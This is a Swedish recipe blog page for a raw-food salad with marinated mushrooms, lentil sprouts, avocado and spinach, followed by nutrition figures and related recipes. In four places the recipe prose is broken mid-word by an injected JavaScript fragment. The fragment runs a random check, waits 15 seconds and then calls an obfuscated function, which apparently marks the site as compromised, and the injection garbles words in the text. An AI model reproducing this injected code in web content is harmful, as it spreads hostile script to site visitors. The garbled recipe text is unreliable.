Raw sallad

2013-08-26
_SAM0110_SAM0113
  • Servings : 1
  • Prep Time : 10m
  • Cook Time : 0m
  • Ready In : 0m

Har fastnat för raw food. Men bli inte oroliga nu för jag har inte gått över till den ”trädkramandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e, vegan, allt rått sidan” Men jag har börjat inse fördelarna med att äta mer ekologiskt och raw food. Har börjat gro mina egna groddar och smyger in det i kosten mer och mer. Det är lättare än jag trodde att gro även om jag fått ångra vissa experimnet för att hela lägenheten har luktat unket av vissa misstag, men nu har jag börjat få rätt på groddningen. Mer om det en annan dag.

Ingredienser

  • 70g kvartad skogchampinjon
  • 50g linsgroddar (eller andandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ra groddar)
  • 20g fin hackad lök
  • 30g skivad grön paprika
  • 30g tärnad avokado
  • 40g spenat

Marinad

  • 5g 1 tesked sojasås
  • 5g 1-2 teskedar olivolja
  • 10g 1 matsked äpplecidervinäger
  • 1/2 krossad vitlöksklyfta
  • 1/4 tesked sambaolek
  • 1 tesked persilja
  • Örtsalt

Gör så här:

Lägg champinjonerna i en skål med marinade i
5 minuter. Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a sen i allt förutom spenat.
Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i spenaten, precis innan ni ska servera den.

Recipe Type:
Medlemsbetyg

(5 / 5)

5 5 1
Betygsätt recept

1 people rated this recipe

Related Recipes:
  • _SAM0905

    Sallad på svartvitlöks rostad pumpa, lök, paprika, tomat med chevreost, spenat och svartkålschips.

  • _SAM0254

    Groddslaw med kalkon

  • _SAM0279

    Kycklinglever stekt i svartvitlök

  • _SAM0095

    Kyckling med avokado, linsgrodd och spenatsallad.

  • _SAM0172

    Lax med teriyakimarinerade linsgroddar

Näringssinnehåll

Informationen gäller per portion

  • Kcal

    199
  • Protein

    8,4 g
  • Kolhydrater

    16,4 g
  • Fett

    10,2 g

Recipe Comments

Post A Comment

Current ye@r *